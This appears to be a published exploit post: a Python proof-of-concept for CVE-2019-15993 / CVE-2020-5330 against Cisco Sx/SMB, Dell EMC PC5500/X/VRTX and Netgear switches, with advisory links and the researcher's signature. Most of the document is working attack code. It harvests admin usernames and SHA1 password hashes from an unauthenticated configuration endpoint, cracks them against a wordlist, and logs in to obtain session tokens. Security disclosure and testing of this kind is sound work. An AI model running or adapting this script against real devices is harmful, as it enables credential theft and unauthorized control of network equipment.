# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability>
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle
import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) < 3:
print("Usage: python cve-2019-15993.py URL passwordfile")
sys.exit()
url = sys.argv[1]
file = sys.argv[2]
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def hash_value(value):
"""Calculate the SHA1 hash of a value."""
sha1 = hashlib.sha1()
sha1.update(value.encode('utf-8'))
return sha1.hexdigest()
def userName_parser(text, start_delimiter, end_delimiter):
results = []
iteration = 0
start = 0
while start >= 0:
start = text.find(start_delimiter, start)
if start >= 0:
start += len(start_delimiter)
end = text.find(end_delimiter, start)
if end >= 0:
results.append(text[start:end])
start = end + len(end_delimiter)
iteration = iteration + 1
return results
# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)
# Read in the values from the file
with open(file, 'r') as f:
values = f.readlines()
values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}
if response.status_code == 302:
print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
url = response.headers["Location"] + "config/device/adminusersetting"
response=requests.get(url, verify=False)
if response.status_code == 200:
print("[*] Successful request to URL:", url + "\n")
content = response.text
users_names = userName_parser(content,"<userName>","</userName>")
sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)
print("SHA1 Hashes found:\n")
loops = 0
while loops < len(sha1_hashes):
print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")
for sha1_hash in sha1_hashes:
if sha1_hash in hashes:
print("Match:", sha1_hash, hashes[sha1_hash])
print("\nTesting Credentials via API.\n\n")
payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])
response_login = requests.get(payload, allow_redirects=False, verify=False)
headers = response_login.headers
if "sessionID" in headers:
print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
print(headers["sessionID"])
else:
print("Unable to sign in.")
loops = loops + 1
else:
print("Host is not vulnerable:", response.status_code)
[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]
Ken Pyle
M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
Main: 267-540-3337
Direct: 484-498-8340
Email: [email protected]
Website: www.cybir.com